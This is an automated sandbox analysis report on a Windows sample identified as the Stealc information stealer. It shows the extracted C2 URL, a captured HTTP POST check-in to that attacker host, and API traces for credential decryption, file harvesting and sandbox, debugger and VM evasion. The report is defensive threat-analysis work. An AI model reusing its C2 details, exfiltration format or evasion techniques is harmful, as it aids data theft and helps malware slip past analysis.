Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542004
MD5:e5554752275f657385f52a9200ce5d65
SHA1:20111ab044d48a47dcd1240fd0b098f024c16bc4
SHA256:75c80ec13c3aae80d4eaf263e35ac39fdc644b4b4eb7fab66a4217354bd7e5fd
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E5554752275F657385F52A9200CE5D65)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2884JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2884JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.930000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T12:33:22.999220+020020442431Malware Command and Control Activity Detected192.168.2.549721185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.930000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0093C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00939AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00939AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00937240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00937240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00939B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00939B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00948EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00948EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00944910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0093DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0093E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0093ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00944570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F68A FindFirstFileA,0_2_0093F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00943EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0093BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49721 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 39 37 36 39 45 30 42 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 2d 2d 0d 0a Data Ascii: ------FBGCAAAAFBKEBFHJEGCFContent-Disposition: form-data; name="hwid"119769E0B74F4033060071------FBGCAAAAFBKEBFHJEGCFContent-Disposition: form-data; name="build"doma------FBGCAAAAFBKEBFHJEGCF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00936280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00936280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 39 37 36 39 45 30 42 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 2d 2d 0d 0a Data Ascii: ------FBGCAAAAFBKEBFHJEGCFContent-Disposition: form-data; name="hwid"119769E0B74F4033060071------FBGCAAAAFBKEBFHJEGCFContent-Disposition: form-data; name="build"doma------FBGCAAAAFBKEBFHJEGCF--
                Source: file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/#
                Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/:
                Source: file.exe, 00000000.00000002.2257803413.0000000001124000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
                Source: file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc%
                Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
                Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37S

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E70_2_00CFB0E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF60F70_2_00CF60F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC80320_2_00BC8032
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFD1340_2_00BFD134
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D039420_2_00D03942
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6825A0_2_00C6825A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF7BC20_2_00CF7BC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA93C80_2_00BA93C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCC34D0_2_00CCC34D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEAB2F0_2_00BEAB2F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C03C570_2_00C03C57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D054060_2_00D05406
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFEDAF0_2_00CFEDAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D005790_2_00D00579
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD25670_2_00CD2567
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF966E0_2_00CF966E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D01E610_2_00D01E61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF16780_2_00CF1678
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEF6280_2_00CEF628
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2CFD00_2_00C2CFD0
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mpjgkmbj ZLIB complexity 0.9952078025174932
                Source: file.exe, 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00948680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00948680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00943720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00943720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3QQ8464Q.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1839104 > 1048576
                Source: file.exeStatic PE information: Raw size of mpjgkmbj is bigger than: 0x100000 < 0x19ae00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.930000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mpjgkmbj:EW;tclqnlva:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mpjgkmbj:EW;tclqnlva:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00949860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cae34 should be: 0x1c8fc6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mpjgkmbj
                Source: file.exeStatic PE information: section name: tclqnlva
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 247ECC19h; mov dword ptr [esp], ebx0_2_00CFB0F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 2A912422h; mov dword ptr [esp], edi0_2_00CFB116
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 1339570Dh; mov dword ptr [esp], edx0_2_00CFB12B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], edx0_2_00CFB15A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 0911048Ah; mov dword ptr [esp], edx0_2_00CFB168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push ebp; mov dword ptr [esp], esi0_2_00CFB1DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 585DA751h; mov dword ptr [esp], ebp0_2_00CFB243
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 222E979Ah; mov dword ptr [esp], ebp0_2_00CFB275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], edx0_2_00CFB307
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 226E7554h; mov dword ptr [esp], edx0_2_00CFB37B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], edi0_2_00CFB39B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push edx; mov dword ptr [esp], esi0_2_00CFB4C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push edx; mov dword ptr [esp], 7FF487FBh0_2_00CFB5DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], 6D6F1CC6h0_2_00CFB6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 30C5F615h; mov dword ptr [esp], edi0_2_00CFB759
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push ebp; mov dword ptr [esp], edi0_2_00CFB8EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 5035BE37h; mov dword ptr [esp], edi0_2_00CFB8F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push edi; mov dword ptr [esp], eax0_2_00CFB98D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 2740F39Dh; mov dword ptr [esp], ebp0_2_00CFBA02
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push ebx; mov dword ptr [esp], ecx0_2_00CFBA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 6F88F947h; mov dword ptr [esp], esp0_2_00CFBA8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 4DD02002h; mov dword ptr [esp], esi0_2_00CFBA93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 1154087Eh; mov dword ptr [esp], ebx0_2_00CFBAF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 6FAFC50Eh; mov dword ptr [esp], ecx0_2_00CFBB01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push ebp; mov dword ptr [esp], eax0_2_00CFBB3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push eax; mov dword ptr [esp], ebx0_2_00CFBB77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 43FF4EC2h; mov dword ptr [esp], ecx0_2_00CFBBA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push ebx; mov dword ptr [esp], eax0_2_00CFBBA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push ebx; mov dword ptr [esp], 6FE6CEA0h0_2_00CFBC4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push edx; mov dword ptr [esp], eax0_2_00CFBC6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB0E7 push 29601D4Eh; mov dword ptr [esp], ecx0_2_00CFBD4A
                Source: file.exeStatic PE information: section name: mpjgkmbj entropy: 7.954876039100938

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00949860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13421
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04F1F second address: D04F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04F23 second address: D04F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1770B77EA4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04F51 second address: D04F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F1770F379F6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A260 second address: D0A26A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1770B77E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A26A second address: D0A285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1770F37A00h 0x00000008 jno 00007F1770F379F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
